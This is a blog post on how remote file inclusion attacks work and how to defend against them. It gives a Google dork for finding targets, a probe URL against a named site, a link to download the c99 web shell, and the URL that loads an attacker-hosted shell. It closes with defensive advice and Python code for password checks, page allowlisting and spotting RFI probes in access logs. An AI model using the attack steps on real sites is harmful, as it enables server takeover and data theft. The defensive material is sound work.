By Doug Mewis

How Hackers Hack a Website Using Remote File Inclusion

(I actually stole much of this text from a hacking website while I was preparing security on a software application I am working on.)

Remote file inclusion (RFI) is one of the most common vulnerabilities found in web applications. This type of vulnerability allows an attacker to include a remote file on the web server. If the attack succeeds, the attacker gains access to the web server and can execute any command on it. RFI is the main method of carrying out a C99 website attack, but not the only one.
Searching for the Vulnerability
Remote file inclusion vulnerabilities usually occur on sites whose navigation uses URLs similar to the one below:

www.Targetsite.com/index.php?page=Anything

To find the vulnerability, the hacker will most commonly use the following Google dork:

“inurl:index.php?page=”

This will show all the pages that have “index.php?page=” in their URL. To test whether a website is vulnerable to remote file inclusion, the hacker uses a URL of the following form:

www.targetsite.com/index.php?page=www.google.com

Let's say that the target website is http://www.cbspk.com. The hacker's URL will then become:

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If the Google homepage shows up after executing the command, then the website is vulnerable to this attack; if it does not come up, then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage showed up, indicating that the website is vulnerable to this attack. Now the hacker would upload a shell to gain access. The most common shells used are the c99 shell and the r57 shell. I would use the c99 shell. You can download the c99 shell from the link below:

http://downloads.ziddu.com/downloadfile/12628679/c99shell.rar.html

The hacker would first upload the shell to a web hosting site such as ripway.com or 110mb.com. Here is how a hacker would execute the shell to gain access. Let's say that the URL of the shell is:

http://h1.ripway.com/rafaybaloch/c99.txt

The hacker would then execute the following command to gain access:

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of the URL, or else the shell will not execute. Now the hacker is inside the website and can do anything with it.
What is the defense against C99 website attacks?
First read the article on Remote File Inclusion. The above is exactly the method I explained in the article on RFI attacks. C99 attacks go a step further by injecting a shell script onto your website.
Change your passwords regularly. Hackers who are unable to attack your website using RFI methods will try to hack vulnerable websites by exploiting weak password security. Set a minimum length on your passwords and require a mix of upper- and lowercase letters plus some numerical characters. Special characters help, but sometimes people prefer not to have to use them. I recommend a setting that requires both upper- and lowercase characters plus at least one numerical one. The key here is: do not use common words. You may also want to reject passwords containing disallowed words such as the user name or any information in the user profile.
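The password rules described above (minimum length, mixed case, at least one digit, no common words, nothing taken from the user name or profile) can be enforced at registration and password-change time. The following Python function is an added example, not code from this post or from any product it mentions; the minimum length of 10, the small common-word list and the sample profile values are constructed assumptions, since the post sets no specific numbers.

```python
import re

MIN_LENGTH = 10  # assumed minimum; the post gives no specific number

# Constructed, deliberately small blocklist; a real deployment would load a
# much larger list of common passwords from a file.
COMMON_WORDS = {"password", "letmein", "welcome", "qwerty", "admin"}


def password_policy_violations(password, username="", profile_fields=()):
    """Return a list of reasons the password fails the policy (empty list = accepted).

    profile_fields holds other values tied to the account (first name, last
    name, email local part, ...) that must not appear inside the password.
    """
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("no digit")

    lowered = password.lower()
    for word in sorted(COMMON_WORDS):
        if word in lowered:
            problems.append(f"contains common word {word!r}")

    # Reject the user name and any profile value (case-insensitive substring
    # match); values shorter than three characters are skipped so that a
    # two-letter name does not block almost every password.
    candidates = [("username", username)] + [("profile", v) for v in profile_fields]
    for label, value in candidates:
        v = value.strip().lower()
        if len(v) >= 3 and v in lowered:
            problems.append(f"contains {label} value {value!r}")
    return problems


if __name__ == "__main__":
    # Constructed sample account and candidate passwords
    for candidate in ("Tr0ubadour42", "Doug12345678", "Password123", "short1A"):
        print(candidate, "->", password_policy_violations(candidate, username="doug",
                                                          profile_fields=("Mewis",)))
```

The function returns every violated rule rather than stopping at the first one, so the registration form can show the user the full list of what to fix.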
If you suspect you have experienced a C99 attack (you can usually tell by finding files in your website root that you did not add), notify your host via a support ticket and request help. They will run security software against your website and remove the malicious scripts for you. This takes time and professional skills you may or may not have. You may have to reinstall your whole website from backups, so be prepared.
Back up your website regularly. You should do this after each major website script installation or modification, and at regular intervals of at least once a month. You should maintain backup copies going back at least one year in case you need to revert to older versions. This also includes backing up your database.
Ask your host about mod_security. Make sure it is installed to disallow malicious use of URL parameters.
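mod_security is a perimeter control; the application itself should also stop handing the page parameter straight to an include. The fix for the index.php?page= pattern is to map the parameter onto a fixed allowlist of local pages and reject anything else. The following Python function is an added example, not code from this post or from any project it mentions; it assumes a hypothetical pages directory /var/www/site/pages and a constructed allowlist, and it shows the check a PHP include wrapper should perform before touching the filesystem.

```python
import os
from urllib.parse import urlsplit

# Constructed allowlist: the only names that ?page= is allowed to resolve to.
ALLOWED_PAGES = {"home", "about", "contact", "news"}
PAGES_DIR = "/var/www/site/pages"  # assumed location of the page templates


def resolve_page(page_param):
    """Map the untrusted ?page= value to a local file path, or return None.

    Only bare names listed in ALLOWED_PAGES are accepted. Anything carrying a
    URL scheme (http://, ftp://, php://, data:), a path separator, '..', a null
    byte or a query/fragment marker is rejected before the allowlist lookup, so
    remote files and stream wrappers can never reach the include.
    """
    page = "home" if page_param is None else page_param

    # A scheme means a remote URL or a PHP stream wrapper: reject outright.
    if urlsplit(page).scheme:
        return None
    # Characters that could escape the pages directory or smuggle extra input.
    if any(bad in page for bad in ("/", "\\", "..", "\x00", "?", "#")):
        return None
    # Exact, case-sensitive match against the allowlist.
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(PAGES_DIR, page + ".php")


if __name__ == "__main__":
    # Constructed inputs: a legitimate page, the probe from the post, and a
    # traversal attempt; only the first one resolves.
    for value in ("about", "http://www.google.com", "../../etc/passwd", "php://input"):
        print(repr(value), "->", resolve_page(value))
```

Logging the rejected values (with time and client IP) is worthwhile as well, because a page parameter that carries a scheme is a near-certain sign of an RFI probe rather than a typo.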
If you experienced a C99 attack, notify your users, as their information is likely compromised. They need to take action to change their passwords and make sure their own websites are protected. More likely it is their personal information that is compromised, if you store it on the server. They have to know in order to protect themselves. If you do not store personal information, my recommendation is to force all users to change their passwords and implement password strength requirements.
Search for rootkit scanners. You may need to install one at the website level if you do not have root access. If you are on a shared account, ask your host whether they use one and how often.
Monitor your traffic logs. Most people have these logs sitting on their web servers but never look at them until something breaks. Monitor your traffic regularly and watch for suspicious activity. Log failed login attempts and record the IP at the time. Record “forbidden” and “page not found” errors along with time, date, and IP. This will at least give you an idea of where an attack may have come from. Hacking attempts usually form a pattern; if you log them, you can potentially see where they are coming from and work out from there what to do about it, or what questions to ask. Most attacks will come from free proxy services that hackers use, so I would be alert if any connection via a proxy is attempted.
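The log review described above can be automated: parse the web server access log, flag requests whose query parameters carry a remote URL (the RFI probe pattern from earlier in this post), and tally failed logins, 403s and 404s per client IP. The following Python script is an added example, not code from this post; the log lines are constructed samples in Apache combined format, and it assumes a hypothetical login form at /login.php that answers a failed login with HTTP 401 (many applications return 200 with an error page instead, in which case that check must be adapted). It generalises slightly beyond the post by checking every query parameter, not only page=.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /v2/index.php?page=about HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /v2/index.php?page=http://www.google.com HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /v2/index.php?page=http://evil.example/c99.txt? HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Oct/2023:14:02:10 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "curl/7.68.0"
198.51.100.3 - - [10/Oct/2023:14:02:12 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "curl/7.68.0"
198.51.100.3 - - [10/Oct/2023:14:02:15 +0000] "GET /wp-admin/ HTTP/1.1" 403 199 "-" "curl/7.68.0"
192.0.2.9 - - [10/Oct/2023:14:10:00 +0000] "GET /images/logo.png HTTP/1.1" 404 180 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request line and status code from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

LOGIN_PATH = "/login.php"  # assumed login endpoint


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_include_params(target):
    """List (name, value) for every query parameter whose value carries a URL scheme.

    A scheme (http, https, ftp, php, data, ...) inside a parameter value is the
    signature of a remote file inclusion probe.
    """
    query = urlsplit(target).query
    hits = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if urlsplit(value).scheme:
                hits.append((name, value))
    return hits


def analyze(log_text):
    """Summarise suspicious activity per client IP."""
    report = defaultdict(lambda: {"rfi_attempts": [], "failed_logins": 0,
                                  "forbidden": 0, "not_found": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ip"]]
        for name, value in remote_include_params(rec["target"]):
            entry["rfi_attempts"].append((rec["time"], name, value))
        if rec["method"] == "POST" and rec["target"].startswith(LOGIN_PATH) and rec["status"] == 401:
            entry["failed_logins"] += 1
        if rec["status"] == 403:
            entry["forbidden"] += 1
        elif rec["status"] == 404:
            entry["not_found"] += 1
    return dict(report)


if __name__ == "__main__":
    for ip, findings in analyze(SAMPLE_LOG).items():
        print(ip, findings)
```

Run against a real access log, the per-IP summary makes the pattern the post talks about visible at a glance: one address probing page= with external URLs, another hammering the login form, and ordinary visitors with nothing but the occasional 404.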
